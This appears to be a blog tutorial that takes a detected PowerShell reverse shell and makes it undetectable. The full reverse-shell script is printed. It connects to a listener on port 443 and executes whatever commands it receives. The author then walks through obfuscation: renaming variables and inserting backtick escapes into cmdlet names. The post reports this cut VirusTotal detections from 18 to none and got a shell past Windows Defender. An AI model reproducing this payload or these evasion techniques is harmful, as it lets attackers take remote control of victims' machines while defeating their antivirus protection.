search

From Detected to Undetected

hashtag
Introduction

It's a boring weekend, and it's so cold outdoors. So let's play a little bit with VirusTotal.

What we are going to do right now is to take a detected sample of the antivirus and make it undetectable.

VirusTotal aggregates many antivirus products and online scan engines to check for viruses that the user's own antivirus may have missed or verified against any false positives. Antivirus software vendors can receive copies of files flagged by other scans but passed by their own engine to help improve their software.

hashtag
Malicious Sample

Our sample choice is "PowerShell reverse shellarrow-up-right.", coded by Nikhil Mittalarrow-up-right.

$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",443)
$stream = $client.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$sendback = (iex $data 2>&1 | Out-String )
$sendback2  = $sendback + "PS " + (pwd).Path + "> "
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()}
$client.Close()

First, let’s check our sample with VirusTotal for first time before doing anything.

VirusTotal’s resultarrow-up-right showed that 18 security vendors detected it. Let’s play now.

hashtag
Playtime

The easiest thing we can do first. It is changing the names of the variables with random names.

Let’s scan again now with our friend.

Fourteen security vendors were flagged as malicious on VirusTotalarrow-up-right. Hmm, there is progress! With a few changes, we bypassed four vendors. Let's continue.

If we go to detailsarrow-up-right in VirusTotal’s report, we will find the “Powershell Info” section. We will see that VirusTotal identifies the cmdlets used in our script.

hashtag
The magic of `

Let's try to add backtick between the commands. Then we'll see if VirusTotal can catch it or not.

PowerShell supports a set of special characterarrow-up-right sequences that are used to represent characters that aren't part of the standard character set. The sequences are commonly known as escape sequences.

Escape sequences begin with the backtick character, known as the grave accent (ASCII 96), and are case-sensitive. The backtick character can also be referred to as the escape character.

Escape sequences are only interpreted when contained in double-quoted (") strings.

Sequence
Description

`0

Null

`a

Alert

`b

Backspace

`e

Escape

`f

Form feed

`n

New line

`r

Carriage return

`t

Horizontal tab

`u{x}

Unicode escape sequence

`v

Vertical tab

So, we must be wary of where we set the backtick. We don't want to break our commands.

When we escape, "a" with backtick means alert PowerShell (who`ami), and when we escape "f" with backtick means form feed (ipcon`fig), so both commands break. And when we escape the other character, commands don't break because then characters do not render the special meaning.

To make the picture clear to you. See the following image.

Let's continue and add backtick to our code.

Upload it to VirusTotal again and scan it.

Really, I'm disappointed! We want to play more, but "No security vendors and no sandboxes flagged this file as malicious.”

As shown in the result. VirusTotalarrow-up-right does not detect cmdlets that are used in our script! The backtick was helpful.

hashtag
Test Time

It's time to test our code to bypass Windows Defender and get a reverse shell. To make sure everything is working correctly.

Victim's machine
Attacker's machine

It works fine.

hashtag
Closing Words

Sometimes, we may not need much to do to avoid antivirus software! We could bypass all the antivirus software by changing the variable names and adding some backtick to the code like what you saw before.

Last updated